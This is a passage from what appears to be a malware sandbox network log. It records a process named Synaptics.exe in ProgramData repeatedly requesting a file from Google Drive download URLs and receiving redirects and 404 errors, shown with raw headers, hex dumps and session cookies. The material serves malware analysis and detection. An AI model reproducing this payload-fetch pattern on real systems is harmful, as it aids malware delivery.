                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:14 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ibNcj7Ed7u9YVEf67NFsEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    26192.168.2.449780142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:14 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:15 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6mqJwtfrff6dEMz2zdI-MZFVEfWBAi9ogwB5EJjBSR-kiKsOHS3hybyISElQzyj6YfFc8Zbf8
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:15 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Hf0HhBYGkcFyoCnC1j0V8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:15 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:15 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 6d 5a 2d 50 51 5f 31 6e 45 58 36 75 44 6d 50 6c 75 49 39 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="-mZ-PQ_1nEX6uDmPluI9NQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:15 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    27192.168.2.449788142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:15 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:16 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5yiLlsHAC2osUDoJ3wZEZkaT_Ww5dW-IkL58V0oCyHflEwfJXLeAYrp7Y76LcdbirVhiQI3uc
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Dh4VrrvCx2pVOWGDxtQUDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:16 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:16 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 53 79 53 79 54 66 55 5a 5f 6e 30 51 64 63 6e 79 78 66 64 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="nSySyTfUZ_n0QdcnyxfdyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:16 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    28192.168.2.449789142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:15 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:16 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4RQLENhRrvzVqueDdzDHQpf4Jyu2yxE_Qp7ZHkhQmYZooQDyTlYdORTrkc-HnRm03K
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-UMQ1vjRA9WsUbxq4ad4D_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:16 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:16 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 4b 6b 6b 43 6b 59 41 64 70 4d 37 74 4f 2d 4b 4a 52 56 79 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="IKkkCkYAdpM7tO-KJRVypA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:16 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    29192.168.2.449786142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YlG8jt15DeWibx6e_1AmGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    30192.168.2.449787142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-vRyUsLoXHXrI1679JEGQrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    31192.168.2.449794142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:16 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AZnOSpdX63AYzK624azC-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    32192.168.2.449795142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:16 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Tuys9KORT7QrWG7Ip2T8eQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
